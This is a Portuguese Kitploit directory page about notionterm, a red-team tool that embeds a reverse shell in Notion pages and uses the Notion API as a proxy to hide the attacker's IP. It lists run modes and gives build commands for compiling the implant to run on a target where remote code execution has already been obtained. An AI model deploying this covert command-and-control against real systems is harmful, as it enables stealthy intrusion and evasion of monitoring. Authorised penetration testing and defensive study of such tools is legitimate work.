Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
notionterm — Incorporar um reverse shell em páginas do Notion usando a API do Notion como proxy, permitindo sessões remotas de shell furtivas com comunicação criptografada e autenticada para operações de red team. | Kitploit
Ferramentas/GitHubGitHub/ariary/notionterm
Geração de PayloadsExploraçãoEngenharia ReversaSegurança WebComando e ControleRed Teaming
GitHubariary/notionterm

notionterm

Incorporar um reverse shell em páginas do Notion usando a API do Notion como proxy, permitindo sessões remotas de shell furtivas com comunicação criptografada e autenticada para operações de red team.

Ver Repositório
13715há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

notionterm

Incorporar reverse shell em páginas do Notion.
Hackeie enquanto toma notas


demo


PARA ➕:

  • Ocultar IP do atacante em reverse shell (Sem interação direta entre atacante e máquina alvo. O Notion é usado como proxy hospedando o reverse shell)
  • Demonstração/Inserção rápida de prova dentro do relatório
  • Reverse shell altamente disponível e compartilhável (desktop, navegador, mobile)
  • Shell remota criptografada e autenticada

NÃO PARA ➖:

  • Sessão de shell interativa e longa (veja tacos para isso)

Porquê? 🤔

O foco foi fazer algo divertido, mas ainda utilizável, embora não seja a solução definitiva para reverse shell no arsenal do pentester.

Como? 🤷‍♂️

Basta usar o Notion normalmente e executar notionterm no alvo.

Requisitos 🖊️

  • Software Notion e chave API
  • Comunicação HTTP permitida do alvo para o domínio do Notion
  • RCE prévio no alvo

vagamente inspirado pela grande ideia do OffensiveNotion e do notionion!

TL;DR

Aprender comandos e flags é muito chato: Use wrap-notionterm.sh

Quickstart

🏗️ Configuração

  1. Crie uma página e conceda à chave da API de integração as permissões de escrita na página.
  2. Compile notionterm e transfira para a máquina alvo (veja Compilação)

👟 Executar

Há 3 maneiras principais de executar notionterm:

Modo "normal"
Obter terminal, parar/continuar, etc...
notionterm [flags]
Inicie o shell com o widget de botão: mude para ON, faça suas tarefas de reverse shell, mude para OFF para pausar, mude para ON para retomar, etc...
Modo "servidor"
Facilita a incorporação do notionterm em qualquer página
notionterm --server [flags]
Inicie uma sessão de shell em qualquer página criando um bloco de incorporação com URL contendo o ID da página (CTRL+L para obtê-lo): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
Modo light
Realiza apenas tráfego HTTP do alvo → notion
notionterm light [flags]

Compilação

Como o notionterm é destinado a ser executado na máquina alvo, deve ser compilado para se adequar a ela.

Portanto, defina a variável de ambiente para atender ao requisito do alvo:

root@kitploit:~
GOOS=[windows/linux/darwin]

Compilação simples

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go

Você precisará definir a chave API e a URL da página do Notion usando variáveis de ambiente (NOTION_TOKEN & NOTION_PAGE_URL) ou flags (--token & --page-url)

Compilação "tudo incluído"

Incorpore diretamente o token da API de integração do Notion e a URL da página do Notion no binário. ⚠️ Qualquer pessoa com acesso ao binário pode recuperar o token. Por razões de segurança, não o compartilhe e remova após o uso.

Defina as variáveis de ambiente correspondentes:

root@kitploit:~
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

E compile:

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS
Baixar ferramenta